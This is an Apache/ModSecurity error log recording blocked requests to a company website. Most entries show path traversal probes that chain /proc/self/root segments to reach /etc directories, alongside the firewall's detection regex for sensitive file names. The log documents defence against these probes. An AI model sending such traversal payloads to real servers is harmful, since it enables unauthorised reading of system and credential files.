[Mon Mar 16 16:43:22.047484 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:58886] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdWo6lpbStxTqkSkt99wAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:25.144665 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:57516] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdXbysWC90G-1nBrBXTAAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:26.508153 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:58056] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdXv9ocpUE4ed4uDwF9gAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:28.736547 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.243.203:58060] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdYKTCbgAP5jq5TehACwAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:31.499027 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.243.203:58070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdYtSswJuvopo3lOhykgAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:32.579881 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:58902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdZP9ocpUE4ed4uDwF-wAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:35.049093 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:46986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdZ8_BxrYCr4hPDw_93wAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:36.404641 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:47000] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdaI6lpbStxTqkSkt9-gAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:37.594126 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:47014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdaVajLEzk2WiQ-10mmwAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:49.368961 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.241.46:39080] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhddaTCbgAP5jq5TehAJwAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:56.839287 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.243.203:36938] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdfKTCbgAP5jq5TehALwAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:58.900010 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:58132] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdfo6lpbStxTqkSkt9_QAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:44:05.729507 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:42418] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdhf9ocpUE4ed4uDwGEwAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:44:11.522705 2026] [:error] [pid 29802:tid 140411733534464] [client 74.7.243.203:42420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdi8_BxrYCr4hPDw_96AAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:44:19.419297 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.243.203:38176] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdk0r9dMAiw-8KANNaKgAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:44:19.915250 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:35608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdk_9ocpUE4ed4uDwGHwAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:44:22.948949 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:53340] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdlrABkC4fWIHEf8EGkgAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:44:26.560931 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:53356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdmo6lpbStxTqkSkt-CAAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:44:44.073182 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:53366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdrNSswJuvopo3lOhyuAAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:44:45.412801 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.243.203:43932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdrUr9dMAiw-8KANNaQAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:44:45.414798 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.244.31:34694] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhdrUr9dMAiw-8KANNaPwAAARg"]
[Mon Mar 16 16:44:48.254541 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:51234] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdsLysWC90G-1nBrBXdAAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
